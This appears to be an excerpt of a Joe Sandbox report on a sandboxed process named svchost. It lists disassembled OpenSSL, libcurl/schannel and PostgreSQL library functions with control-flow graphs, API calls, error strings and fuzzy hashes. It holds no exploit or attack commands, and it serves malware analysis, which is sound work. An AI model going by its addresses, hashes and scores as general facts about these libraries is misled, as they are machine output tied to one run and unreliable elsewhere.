                          control_flow_graph 1830 7ffda3397970-7ffda3397980 call 7ffda33aedf0 1833 7ffda3397982-7ffda3397986 1830->1833 1834 7ffda33979a4-7ffda33979ad 1830->1834 1835 7ffda3397996-7ffda339799f 1833->1835 1836 7ffda3397988-7ffda339798b 1833->1836 1837 7ffda33982c0-7ffda33982f7 call 7ffda33aedf0 1834->1837 1835->1837 1836->1834 1838 7ffda339798d-7ffda3397994 1836->1838 1841 7ffda33982fd-7ffda3398314 ERR_clear_error SetLastError 1837->1841 1842 7ffda339855f-7ffda3398579 1837->1842 1838->1834 1838->1835 1843 7ffda3398316-7ffda339831a 1841->1843 1844 7ffda3398321-7ffda339832b 1841->1844 1843->1844 1845 7ffda3398336-7ffda3398339 1844->1845 1846 7ffda339832d-7ffda3398334 1844->1846 1847 7ffda3398379-7ffda3398383 1845->1847 1848 7ffda339833b-7ffda3398346 1845->1848 1849 7ffda3398348-7ffda339834f 1846->1849 1851 7ffda3398395-7ffda339839d 1847->1851 1852 7ffda3398385-7ffda339838f call 7ffda3335e50 1847->1852 1848->1847 1848->1849 1849->1847 1850 7ffda3398351-7ffda3398353 1849->1850 1853 7ffda3398355-7ffda3398358 1850->1853 1854 7ffda339835a-7ffda339835d 1850->1854 1856 7ffda33983a9 1851->1856 1857 7ffda339839f-7ffda33983a2 1851->1857 1852->1842 1852->1851 1858 7ffda3398367-7ffda339836e 1853->1858 1854->1851 1859 7ffda339835f-7ffda3398365 1854->1859 1861 7ffda33983b0-7ffda33983b7 1856->1861 1857->1861 1862 7ffda33983a4 1857->1862 1858->1851 1863 7ffda3398370-7ffda3398377 1858->1863 1859->1851 1859->1858 1865 7ffda33983fa-7ffda3398410 1861->1865 1866 7ffda33983b9-7ffda33983c0 1861->1866 1864 7ffda33985ed-7ffda33985f0 1862->1864 1863->1847 1863->1851 1869 7ffda339866e-7ffda3398679 call 7ffda3397ed0 1864->1869 1870 7ffda33985f2-7ffda33985f5 1864->1870 1871 7ffda339845f-7ffda3398469 1865->1871 1872 7ffda3398412-7ffda339841c 1865->1872 1867 7ffda33983ec-7ffda33983f4 1866->1867 1868 7ffda33983c2-7ffda33983c9 1866->1868 1867->1865 1868->1867 1873 7ffda33983cb-7ffda33983da 1868->1873 1893 7ffda339867f 1869->1893 1894 7ffda3398532 1869->1894 1874 7ffda339868a-7ffda339868d call 7ffda3398720 1870->1874 1875 7ffda33985fb-7ffda3398602 1870->1875 1877 7ffda3398477-7ffda339848d call 7ffda332d840 1871->1877 1879 7ffda339846b-7ffda3398475 ERR_new 1871->1879 1872->1877 1878 7ffda339841e-7ffda3398421 1872->1878 1873->1867 1882 7ffda33983dc-7ffda33983e3 1873->1882 1896 7ffda3398692-7ffda3398695 1874->1896 1883 7ffda3398609-7ffda3398636 ERR_new ERR_set_debug call 7ffda3397c10 1875->1883 1884 7ffda3398604-7ffda3398607 1875->1884 1897 7ffda339849b-7ffda33984a2 1877->1897 1898 7ffda339848f-7ffda3398499 ERR_new 1877->1898 1886 7ffda339842a-7ffda339842f ERR_new 1878->1886 1887 7ffda3398423-7ffda3398428 1878->1887 1880 7ffda3398434-7ffda339845a ERR_set_debug call 7ffda3397c10 1879->1880 1899 7ffda3398535-7ffda3398546 BUF_MEM_free 1880->1899 1882->1867 1890 7ffda33983e5-7ffda33983ea 1882->1890 1891 7ffda339863b-7ffda3398669 ERR_new ERR_set_debug ERR_set_error 1883->1891 1884->1883 1884->1891 1886->1880 1887->1877 1887->1886 1890->1865 1890->1867 1891->1894 1893->1874 1894->1899 1901 7ffda3398697-7ffda33986a8 1896->1901 1902 7ffda33986aa-7ffda33986b0 1896->1902 1904 7ffda33984e8-7ffda3398500 call 7ffda333f340 1897->1904 1905 7ffda33984a4-7ffda33984af BUF_MEM_new 1897->1905 1898->1880 1899->1842 1906 7ffda3398548-7ffda3398556 1899->1906 1901->1869 1902->1899 1903 7ffda33986b6-7ffda33986c3 1902->1903 1903->1899 1915 7ffda339857a-7ffda339857e 1904->1915 1916 7ffda3398502-7ffda339852a ERR_new ERR_set_debug 1904->1916 1907 7ffda33984c0-7ffda33984d0 BUF_MEM_grow 1905->1907 1908 7ffda33984b1-7ffda33984bb ERR_new 1905->1908 1910 7ffda3398558 1906->1910 1911 7ffda339855d 1906->1911 1912 7ffda33984d2-7ffda33984dc ERR_new 1907->1912 1913 7ffda33984e1 1907->1913 1908->1880 1910->1911 1911->1842 1912->1880 1913->1904 1917 7ffda3398585-7ffda3398588 1915->1917 1918 7ffda3398580-7ffda3398583 1915->1918 1916->1894 1919 7ffda339852d call 7ffda3397c10 1916->1919 1921 7ffda33985a5-7ffda33985ac 1917->1921 1922 7ffda339858a-7ffda3398591 1917->1922 1920 7ffda3398593-7ffda339859a 1918->1920 1919->1894 1920->1921 1923 7ffda339859c-7ffda33985a3 1920->1923 1924 7ffda33985ae-7ffda33985bb call 7ffda33a6610 1921->1924 1925 7ffda33985dd-7ffda33985e8 1921->1925 1922->1920 1922->1921 1923->1921 1923->1924 1924->1899 1928 7ffda33985c1-7ffda33985c8 1924->1928 1925->1864 1929 7ffda33985ca-7ffda33985d1 1928->1929 1930 7ffda33985d3 1928->1930 1929->1925 1929->1930 1930->1925
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: R_newR_set_debug$ErrorLastM_freeR_clear_errorR_set_error
                          • String ID: ssl\statem\statem.c$state_machine
                          • API String ID: 2605663294-1334640251
                          • Opcode ID: 48b027c2e20d56dac79a9c5c64ffc6497de1d13581ba5d05f39c203f3311fe2a
                          • Instruction ID: 897b49dc54704a9d47af2fc3963d678d8a223e08e7b90a77f093a1b088a2079a
                          • Opcode Fuzzy Hash: 48b027c2e20d56dac79a9c5c64ffc6497de1d13581ba5d05f39c203f3311fe2a
                          • Instruction Fuzzy Hash: 5AC19031B0EA42C6FB64BB25C4713B92296EF84B44F180835DA0D6A7C7DF7FE8458619
                          Function 00007FFDA55CD010 Relevance: 33.6, APIs: 9, Strings: 10, Instructions: 367encryptionCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: Certmalloc$CertificateContextFreefreememmove$ErrorLastNameString_errnomemsetrealloc
                          • String ID: SSL: failed retrieving public key from server certificate$SSL: public key does not match pinned public key$schannel: %s$schannel: Failed to read remote certificate context: %s$schannel: SNI or certificate check failed: %s$schannel: failed to receive handshake, SSL/TLS connection failed$schannel: failed to send next handshake data: sent %zd of %lu bytes$schannel: next InitializeSecurityContext failed: %s$schannel: unable to allocate memory$schannel: unable to re-allocate memory
                          • API String ID: 726578228-413892695
                          • Opcode ID: 1370aeb09722761c115d09812e566dbe39503a4e3c33be558194c66d30682ad3
                          • Instruction ID: 262aed78e39b0fd3d9bd7c09d2254a5bcaff3adb8dada893c6076c82ffb88731
                          • Opcode Fuzzy Hash: 1370aeb09722761c115d09812e566dbe39503a4e3c33be558194c66d30682ad3
                          • Instruction Fuzzy Hash: 1A02937AB0A7CA86EB62CF15E4643A967A0FB46F84F404035DA4E87796DF7CE450CB04
                          Function 00007FFDA3788140 Relevance: 33.5, APIs: 8, Strings: 11, Instructions: 211networkCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLastR_get_error$E_finishE_freeL_get_errorR_clear_errorS_methodX509_freeX_newfree
                          • String ID: SSL SYSCALL error: %s$SSL SYSCALL error: EOF detected$SSL error: %s$SSL error: certificate verify failed: %s$TLSv1$TLSv1.3$This may indicate that the server does not support any SSL protocol version between %s and %s.$certificate could not be obtained: %s$out of memory allocating error description$system$unrecognized SSL error code: %d
                          • API String ID: 2649262036-2362506927
                          • Opcode ID: 0f4d164b573ed57c619845cad48045907740d817cd1e58aedd085b45466e4b7a
                          • Instruction ID: 474e28b7def8482defd8dea96d702a6131d2226ddf9f9b4d3b171a9dd7deab46
                          • Opcode Fuzzy Hash: 0f4d164b573ed57c619845cad48045907740d817cd1e58aedd085b45466e4b7a
                          • Instruction Fuzzy Hash: 6081BF21F0A64352FA99AB3594352B936C3AF46B86F080535D90F763D7EE2EE480835C
                          Function 00007FFDA55B9B00 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 118COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLast_errno
                          • String ID: %s (0x%08X)$%s (0x%08X) - %s$CRYPT_E_NOT_IN_REVOCATION_DATABASE$CRYPT_E_NO_REVOCATION_CHECK$CRYPT_E_NO_REVOCATION_DLL$CRYPT_E_REVOCATION_OFFLINE$CRYPT_E_REVOKED$No error$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_I_CONTINUE_NEEDED$Unknown error
                          • API String ID: 3939687465-2168394622
                          • Opcode ID: feee24e5bed6a7ee7a67841cdcdd34cb7299311857997a203c2e954a48a94822
                          • Instruction ID: ba4f6760bf99cc680141456d21f5fe94822fac61c24bc6d44181a852ad39880b
                          • Opcode Fuzzy Hash: feee24e5bed6a7ee7a67841cdcdd34cb7299311857997a203c2e954a48a94822
                          • Instruction Fuzzy Hash: F25182AEB0E54E85EE278F05E4A83B92661BF46FD4F9A0031D90D02393EF2CF555D208
                          Function 00007FFDA55CCB80 Relevance: 28.3, APIs: 5, Strings: 11, Instructions: 278libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: ConditionMask$AddressHandleInfoModuleProcVerifyVersionmemmove$ErrorLast_errnocallocfreememset
                          • String ID: ALPN: curl offers %s$Error setting ALPN$ntdll$schannel: SNI or certificate check failed: %s$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: initial InitializeSecurityContext failed: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$wine_get_version
                          • API String ID: 3185706071-3097429119
                          • Opcode ID: a88905b97132a0f103da4ae54ce882051c2e5ca5273eef927e76702f8f95584c
                          • Instruction ID: 2ecfd72b40392f3b3606a90d3fef53b6739a325a3782c4bf5ed78b20d071fdd3
                          • Opcode Fuzzy Hash: a88905b97132a0f103da4ae54ce882051c2e5ca5273eef927e76702f8f95584c
                          • Instruction Fuzzy Hash: D5C16A3AB0A74986EB12DF21E8603AE27A4FB46B88F404036DA5D07B57DF3CE555C708
                          Function 00007FFDA3389940 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 297COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: R_new$R_set_debug$X_get0_cipher$D_get_sizeP_compress_blockR_vset_errormemset
                          • String ID: ssl\record\methods\tls_common.c$tls_write_records_default
                          • API String ID: 909859927-3970931601
                          • Opcode ID: 1151bc5a76b257bebab38f2b3411b41006c6163fbd03b349323ada81ee6bbd9b
                          • Instruction ID: 33c5a250ff4258ef3e482e52a3df49cb2dde3292d18d15bcdfedc12415163591
                          • Opcode Fuzzy Hash: 1151bc5a76b257bebab38f2b3411b41006c6163fbd03b349323ada81ee6bbd9b
                          • Instruction Fuzzy Hash: A9D15D32B0EF8282EB10AB56E4501E963A6FB85BC4F544032DE4E67B9ADF3ED155C704
                          Function 00007FFDA37763C0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 77COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: free$ContextCredentialsDeleteFreeHandleSecurityclosesocket
                          • String ID: show password_encryption
                          • API String ID: 1081927107-3405507779
                          • Opcode ID: 8946289a09cbcf4c43a48a737afeed1ce7ae3a0011d1cbfb3534ccd00b22f732
                          • Instruction ID: 581b433942037c7f43b08aede69611a5a0501e8bc2aa1b82b7eecf6fe82e60df
                          • Opcode Fuzzy Hash: 8946289a09cbcf4c43a48a737afeed1ce7ae3a0011d1cbfb3534ccd00b22f732
                          • Instruction Fuzzy Hash: EF414E35B06B8192E69D8F21E5602B9B761FB48FA0F084735CB6D23795CF39F4A18308
                          Function 00007FFDA557BCC0 Relevance: 18.0, APIs: 1, Strings: 9, Instructions: 490COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: CounterPerformanceQuery
                          • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed
                          • API String ID: 2783962273-3359130258
                          • Opcode ID: 5ec9e25f208905917076be8a858fe11dc98c1fedafb3a8959701a46d42f27656
                          • Instruction ID: 96323609c65e5f075b90c33d837516779dec8c2ffc160bbd6e00444b05dcd493
                          • Opcode Fuzzy Hash: 5ec9e25f208905917076be8a858fe11dc98c1fedafb3a8959701a46d42f27656
                          • Instruction Fuzzy Hash: 3232BF26B0D68A8AFB168FB5D4103BC33A1BB06FA8F044635DE5D67786EF38A551C344
                          Function 00007FFDA55C4CC0 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 176stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: _strdup$callocfreestrncmp
                          • String ID: Could not resolve host: %s$Couldn't resolve proxy '%s'$Failed to resolve host '%s' with timeout after %lld ms$Unix socket path too long: '%s'$localhost/
                          • API String ID: 349811053-652210993
                          • Opcode ID: 1b9ca34e3b3f2d4686301eafdf596b673b5f06633424a2ef55324309f437c312
                          • Instruction ID: c8aadf97d4ab95d94c9be9159304a666136b4c724e2921b4b9c92adc099197eb
                          • Opcode Fuzzy Hash: 1b9ca34e3b3f2d4686301eafdf596b673b5f06633424a2ef55324309f437c312
                          • Instruction Fuzzy Hash: 31713729B0AB8A86FB66DF24E4607B923A0FB46F84F444031DE8D47786EF2DE454C744
                          Function 00007FFD942E7760 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • LoadLibraryW.KERNEL32(?,?,00000000,00007FFD942E7E16,?,?,?,00007FFD942E7D99), ref: 00007FFD942E77CD
                          • GetLastError.KERNEL32(?,?,00000000,00007FFD942E7E16,?,?,?,00007FFD942E7D99), ref: 00007FFD942E77DF
                          • LoadLibraryExW.KERNEL32(?,?,00000000,00007FFD942E7E16,?,?,?,00007FFD942E7D99), ref: 00007FFD942E7821
                          • VirtualProtect.KERNEL32 ref: 00007FFD942E787D
                          • VirtualProtect.KERNEL32 ref: 00007FFD942E78AE
                          • FreeLibrary.KERNEL32(?,?,00000000,00007FFD942E7E16,?,?,?,00007FFD942E7D99), ref: 00007FFD942E78F2
                          • GetProcAddressForCaller.KERNELBASE(?,?,00000000,00007FFD942E7E16,?,?,?,00007FFD942E7D99), ref: 00007FFD942E78FE
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          • Associated: 00000035.00000002.3362523626.00007FFD94240000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362698877.00007FFD9445A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362719340.00007FFD9445D000.00000008.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362740573.00007FFD9445E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 00000035.00000002.3362762637.00007FFD94462000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: Library$LoadProtectVirtual$AddressCallerErrorFreeLastProc
                          • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                          • API String ID: 983678269-1880043860
                          • Opcode ID: 19b8e87cf9301367cd08217d46230329f98ca96a54b7e9c7c7eddbc50712cf40
                          • Instruction ID: bc8066e1fdf611838b2887fa8e001e3b532460281c87562eb0b91b0ef7bb4004
                          • Opcode Fuzzy Hash: 19b8e87cf9301367cd08217d46230329f98ca96a54b7e9c7c7eddbc50712cf40
                          • Instruction Fuzzy Hash: 9A519021B0964691EA349BE6A8A46772354BF9ABB0F488734DE3D073D2EF3DE445C300
                          Function 00007FFDA3793450 Relevance: 16.6, APIs: 11, Instructions: 147COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: _errno$Last$Status$CloseHandle$AttributesErrorFile
                          • String ID:
                          • API String ID: 2758595869-0
                          • Opcode ID: d3df3df46ebeed910f37aa43a7ceb0c59825b7abfe0e09809676aeb9f0070ec4
                          • Instruction ID: 1ac2db00df84c8df265214a095286725fa5a3082af55b15252a9141e534a5a51
                          • Opcode Fuzzy Hash: d3df3df46ebeed910f37aa43a7ceb0c59825b7abfe0e09809676aeb9f0070ec4
                          • Instruction Fuzzy Hash: 6D51C762B0964282F6A18F25A82037A73A2BF58774F514330EA6D677D3DF3EE441C758
                          Function 00007FFDA3398720 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 217COMMON
                          Download Yara Rule
                          APIs
                          • ERR_new.LIBCRYPTO-3-X64(?,?,00000000,-00000031,00007FFDA3398692), ref: 00007FFDA33987D5
                          • ERR_set_debug.LIBCRYPTO-3-X64(?,?,00000000,-00000031,00007FFDA3398692), ref: 00007FFDA33987ED
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: R_newR_set_debug
                          • String ID: ssl\statem\statem.c$write_state_machine
                          • API String ID: 193678381-3145639028
                          • Opcode ID: 375df58a6fe72e2a8ebb13675cc0dc8b7a808cb7e5c548a03534db37eaa960cd
                          • Instruction ID: d67d3cba1ec82e0464ee552e252f1154f420ebfc30aba5cfd5a33f0adb4a01f6
                          • Opcode Fuzzy Hash: 375df58a6fe72e2a8ebb13675cc0dc8b7a808cb7e5c548a03534db37eaa960cd
                          • Instruction Fuzzy Hash: C6A19F32B0EA82C1EB60BF25D4743B92362EB81B48F484032DA0D6B797DE7ED445C315
                          Function 00007FFDA3336950 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 155COMMON
                          Download Yara Rule
                          APIs
                          • ERR_new.LIBCRYPTO-3-X64(?,00007FFDA337612C,?,00007FFDA335F4D2,?,00007FFDA3360F40), ref: 00007FFDA333699C
                          • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFDA337612C,?,00007FFDA335F4D2,?,00007FFDA3360F40), ref: 00007FFDA33369B4
                          • ERR_set_error.LIBCRYPTO-3-X64(?,00007FFDA337612C,?,00007FFDA335F4D2,?,00007FFDA3360F40), ref: 00007FFDA33369C4
                          • ASYNC_get_current_job.LIBCRYPTO-3-X64 ref: 00007FFDA3336A1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: C_get_current_jobR_newR_set_debugR_set_error
                          • String ID: SSL_do_handshake$expect_quic$ssl\quic\quic_impl.c$ssl\ssl_lib.c
                          • API String ID: 2134390360-1983154402
                          • Opcode ID: 65262653f3e098f495c12320a0e5f1a27c419ec530ea063dc5ceeadd3c499906
                          • Instruction ID: a7c4f2c6db3047b4ee1757cc3c6e9870fa4d40729bb91688fe8781358734d4dd
                          • Opcode Fuzzy Hash: 65262653f3e098f495c12320a0e5f1a27c419ec530ea063dc5ceeadd3c499906
                          • Instruction Fuzzy Hash: 8D617032F0EB4186E754AF26E46127E6362FB88B84F144231EA8D67796DF3EE450C744
                          Function 00007FFDA377A090 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82networkCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
